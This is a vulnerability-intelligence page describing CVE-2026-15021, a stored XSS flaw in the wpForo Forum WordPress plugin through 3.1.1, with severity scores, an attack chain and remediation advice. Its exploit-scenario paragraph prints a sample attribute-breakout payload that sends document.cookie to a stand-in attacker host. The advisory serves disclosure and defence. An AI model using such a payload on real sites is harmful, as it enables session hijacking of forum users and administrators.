Skip to main content

wpForo Forum EUVDEUVD-2026-44899

| CVE-2026-15021 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-16 Wordfence GHSA-76cp-m73j-f6wq
6.4
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
vuln.today AI
5.4 MEDIUM

Stored XSS requires victim to load the injected page (UI:R); subscriber auth required (PR:L); scope change confirmed as payload executes in other users' sessions (S:C).

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jul 16, 2026 - 09:08 vuln.today
CVE Published
Jul 16, 2026 - 08:26 cve.org
MEDIUM 6.4

DescriptionCVE.org

The wpForo Forum plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'location' Profile Field in all versions up to, and including, 3.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The sanitize_text_field() function applied at input does not encode double quotes, allowing attribute breakout via a payload that escapes the href attribute context and injects event handler attributes.

AnalysisAI

Stored Cross-Site Scripting in the wpForo Forum WordPress plugin (all versions through 3.1.1) allows authenticated attackers with subscriber-level access to permanently inject malicious JavaScript via the 'location' profile field. The root failure is WordPress's native sanitize_text_field() function, which strips tags but leaves double quotes unencoded, enabling attribute breakout from an href context into injected event-handler attributes. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Register subscriber account on target WordPress site
Delivery
Set location profile field to attribute-breakout XSS payload
Exploit
Server stores unsanitized payload in database
Execution
Admin or user navigates to attacker profile page
Persist
Browser renders unencoded double quotes and executes injected event handler
Impact
Steal session token or perform privileged action as victim

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to hold at minimum a subscriber-level WordPress account on the target site - unauthenticated exploitation is not possible (CVSS PR:L). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 6.4 Medium score reflects meaningful but bounded risk. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker registers a free subscriber account on a WordPress site running wpForo Forum 3.1.1 or earlier, then sets the 'location' profile field to a crafted payload such as " onclick="fetch('https://attacker.example/steal?c='+document.cookie) - this breaks out of the href attribute and injects a JavaScript event handler. When an administrator or any other authenticated user subsequently views the attacker's forum profile, the injected script executes in their browser session, potentially exfiltrating session cookies or performing actions under the victim's identity. …
Remediation A code-level fix is referenced by the WordPress plugin trac changeset at https://plugins.trac.wordpress.org/changeset?reponame=&old=3603849%40wpforo&new=3603849%40wpforo; however, the exact patched release version is not confirmed from the available intelligence data - site administrators should update wpForo Forum to the latest version available in the WordPress Plugin Directory and verify the installed version exceeds 3.1.1. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2023-2249 HIGH
8.8 Jun 09

The wpForo Forum plugin for WordPress is vulnerable to Local File Include, Server-Side Request Forgery, and PHAR Deseria

CVE-2024-3200 CRITICAL
9.9 Jun 01

The wpForo Forum plugin for WordPress is vulnerable to SQL Injection via the 'slug' attribute of the 'wpforo' shortcode

CVE-2023-2309 MEDIUM POC
6.1 Jul 24

The wpForo Forum WordPress plugin before 2.1.9 does not escape some request parameters while in debug mode, leading to a

CVE-2021-24406 MEDIUM POC
6.1 Jul 06

The wpForo Forum WordPress plugin before 1.9.7 did not validate the redirect_to parameter in the login form of the forum

CVE-2018-11709 MEDIUM POC
6.1 Jun 04

wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unaut

CVE-2026-49769 CRITICAL
9.8 Jun 15

Unauthenticated PHP Object Injection in the wpForo Forum WordPress plugin versions 3.1.0 and earlier allows remote attac

CVE-2026-49767 CRITICAL
9.8 Jun 17

Authentication bypass in the wpForo Forum WordPress plugin versions 3.1.0 and earlier allows remote unauthenticated atta

CVE-2026-40798 CRITICAL
9.3 Jun 15

Unauthenticated SQL injection in the wpForo Forum WordPress plugin (versions 3.0.4 and earlier) allows remote attackers

CVE-2022-40200 HIGH
8.8 Nov 17

Auth. Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, low attack complexity. No vendor patch

CVE-2022-40192 HIGH
8.8 Nov 17

Cross-Site Request Forgery (CSRF) vulnerability in wpForo Forum plugin <= 2.0.9 on WordPress. Rated high severity (CVSS

CVE-2022-38144 HIGH
8.8 Sep 09

Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team wpForo Forum plugin <= 2.0.5 at WordPress. Rated high s

CVE-2026-28562 HIGH
8.2 Feb 28

Unauthenticated SQL injection in wpForo 2.4.14 allows remote attackers to extract sensitive data from WordPress database

Share

EUVD-2026-44899 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy